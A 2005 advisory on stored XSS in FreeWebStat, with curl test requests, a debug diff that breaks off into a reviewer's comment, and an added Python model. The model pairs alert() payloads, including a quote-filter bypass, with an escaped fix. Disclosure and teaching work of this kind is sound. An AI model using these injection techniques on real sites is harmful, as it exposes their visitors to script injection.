FreeWebStat Multiple XSS Vulnerabilities

Name              Multiple XSS Vulnerabilities in FreeWebStat
Systems Affected  FreeWebStat (verified on 1.0 rev37)
Severity          Medium Risk
Vendor            www.freewebstat.com
Advisory          www.ush.it/2005/11/19/free-web-stat/
Author            Francesco ‘aScii’ Ongaro (ascii at katamail . com)
Date              20051119

I. BACKGROUND

FreeWebStat is a PHP stats program; more information is available at the vendor site.

II. DESCRIPTION

FreeWebStat 1.0 rev37 (the latest version at the time of writing) is vulnerable to multiple XSS. The impact is a little bigger than usual, since the submitted data is stored to a file and the result of a single query persists for some time on the backend. A well-timed loop of requests keeps the XSS permanent.

We issued an advisory for another application by the same author, called "Php Web Statistik Multiple Vulnerabilities", who said "new version with all fixed bugs can be found under www.freewebstat.com". Well, we downloaded this version and saw the same type of vulnerabilities.

The old advisory: http://www.ush.it/2005/11/19/php-web-statistik/

III. ANALYSIS

This vulnerability can be exploited by a GET query.

1) logdb.html XSS

logdb.html is vulnerable to JS injection using anti-escape methods (eg: single quotes are stripped, but there are a lot of working workarounds for this).

1.1) Curl the pixel.php

curl "http://local.asciistation.zapto.org/fws/pixel.php ?domain= &site= &jsref= &jsres= &jscolor=" -A "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1.3))" -e "http://www.ush.it"

$site, $jsref, $jsres and $jscolor are vulnerable. Loading a URL in $jsref will give you a full link (if the logdb.html page has any PageRank you can drain some of it).

1.2) Call stats.php

This will generate the new logdb.html file.

1.3) Visit logdb.html

You will see some alerts. : ) The order with the example query is 2 3 2 3 4 5.

1.4) Some test curls

ascii> curl "http://local.asciistation.zapto.org/fws/pixel.php?domain=ush.it&site=&jsref=1024x768&jsres=1337&jscolor=red" -e "http://www.google.it/search?q=lello+splendor++&hl=it&lr=&start=10&sa=N" -A "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1.3))"

ascii> curl "http://local.asciistation.zapto.org/fws/pixel.php?domain=ush.it&site=aa&jsref=http://ww.tin.it&jsres=1337&jscolor=red" -e "http://www.google.it/search?q=lello+splendor++&hl=it&lr=&start=10&sa=N" -A "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1.3))"

ascii> curl "http://local.asciistation.zapto.org/fws/pixel.php?domain=ush.it&site=aa&jsref=http://ww.tin.it&jsres=1337&jscolor=red" -e "http://www.suma.it/" -A "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1.3))"

ascii> curl "http://local.asciistation.zapto.org/fws/pixel.php?domain=&site=&jsres=&jscolor= " -A "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1.3))" -e "http://www.ush.it"

2) stat.php search key XSS

2.1) Detecting the search key XSS

- if ( !in_array ( $logfile_entries [ 2 ] , $ip_archive ) )
+ if (TRUE)
= # save the referer except the own domain name. if the browser value is empty, do not save
+ echo "DEBUG
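Review bot: `+ if (TRUE)` deletes the `in_array($logfile_entries[2], $ip_archive)` duplicate-IP check outright instead of bypassing it for the test run, so every hit from the same address is saved again; that is what makes the search-key path reachable from a single test host, but the same edit in a deployed stat.php turns the log into an unbounded sink for repeated requests. The following `+ echo "DEBUG` line prints into the generated page, which is already the output sink for attacker-controlled data, so both changes belong behind a local-only debug flag rather than in the script proper. Also, `=` is not a diff marker; give the context line a leading space so the hunk applies with patch(1).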
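The logdb.html pipeline from section 1 (pixel.php records the hit, stats.php regenerates logdb.html, the browser renders it) and the persistence argument from section II, as an added example in Python. This is not FreeWebStat's code: it models the behaviour the advisory describes, with single-quote stripping as the only filter, and sets it beside a hardened variant that escapes at output. The field set, the bounded log size, the HTML layout and the three payloads are assumptions made for the model; only the parameter names (site, jsref, jsres, jscolor) and the Referer/User-Agent inputs come from the advisory.

```python
"""Model of the stored-XSS pipeline from section 1 (added example, not FreeWebStat's code)."""
import html
import re
from collections import deque

FIELDS = ("site", "jsref", "jsres", "jscolor", "referer", "ua")
LOG_SIZE = 3  # assumption: the backend keeps only the last N hits, so an entry ages out
SCRIPT_RE = re.compile(r"<script[^>]*>(.*?)</script>", re.I | re.S)


def new_log():
    """The store pixel.php appends to, modelled as a bounded ring of hits."""
    return deque(maxlen=LOG_SIZE)


def pixel_php(log, params, referer="", user_agent=""):
    """Model of pixel.php: logs the request as received, without validation.
    Every field is attacker-controlled (query string, Referer, User-Agent)."""
    entry = {k: params.get(k, "") for k in ("site", "jsref", "jsres", "jscolor")}
    entry["referer"], entry["ua"] = referer, user_agent
    log.append(entry)


def strip_single_quotes(value):
    """The only filter the advisory reports: single quotes are dropped."""
    return value.replace("'", "")


def render_row(cells, link):
    """One logdb.html row; jsref becomes a clickable link (the 'full link' in the text)."""
    ref = cells["jsref"]
    if link:
        ref = '<a href="%s">%s</a>' % (ref, ref)
    tds = [cells["site"], ref, cells["jsres"], cells["jscolor"], cells["referer"], cells["ua"]]
    return "<tr><td>" + "</td><td>".join(tds) + "</td></tr>"


def stats_php_vulnerable(log):
    """Model of stats.php regenerating logdb.html with quote stripping as the only defence."""
    rows = [render_row({k: strip_single_quotes(e[k]) for k in FIELDS}, link=True) for e in log]
    return "<table>\n" + "\n".join(rows) + "\n</table>"


def stats_php_fixed(log):
    """Hardened variant: escape every field for its HTML context (the Python
    equivalent of htmlspecialchars($v, ENT_QUOTES)) and only turn jsref into a
    link when it is an http(s) URL, which rules out javascript: and attribute breakouts."""
    rows = []
    for e in log:
        cells = {k: html.escape(e[k], quote=True) for k in FIELDS}
        is_url = re.match(r"https?://", e["jsref"], re.I) is not None
        rows.append(render_row(cells, link=is_url))
    return "<table>\n" + "\n".join(rows) + "\n</table>"


def scripts_executed(page):
    """What a browser would run when showing the page: the bodies of its <script> blocks."""
    return [body.strip() for body in SCRIPT_RE.findall(page)]


def demo():
    """Three constructed payloads against the quote-stripping filter."""
    log = new_log()
    pixel_php(log, {
        "site": "<script>alert('x')</script>",  # mangled to alert(x): no popup, the filter 'works'
        "jsres": "<script>alert(2)</script>",   # a number needs no quotes: the filter is irrelevant
        "jsref": '" onmouseover="alert(3)',     # double quotes are untouched: attribute breakout
    })
    vuln, fixed = stats_php_vulnerable(log), stats_php_fixed(log)
    return {
        "vuln_scripts": scripts_executed(vuln),
        "vuln_breakout": 'onmouseover="alert(3)"' in vuln,
        "fixed_scripts": scripts_executed(fixed),
        "fixed_breakout": 'onmouseover="alert(3)"' in fixed,
    }


def persists(legit_hits, reinject_every):
    """The 'well-timed loop' from section II: the injected entry survives only
    if it is re-sent before LOG_SIZE legitimate hits push it out of the log."""
    log = new_log()
    payload = {"jscolor": "<script>alert(5)</script>"}
    pixel_php(log, payload)
    for i in range(1, legit_hits + 1):
        pixel_php(log, {"jscolor": "red"}, referer="http://tracked.example/")  # constructed hit
        if reinject_every and i % reinject_every == 0:
            pixel_php(log, payload)
    return bool(scripts_executed(stats_php_vulnerable(log)))


if __name__ == "__main__":
    print(demo())
    print(persists(10, 0), persists(10, 2))
```

The point of the model is that stripping one character is not an output encoding: a numeric alert needs no quotes, and a double quote breaks out of the href attribute the same way it would in the real page. Escaping at the point of rendering, with quotes included, closes both, and the URL check on jsref is what keeps the "full link" feature without letting it carry a javascript: target.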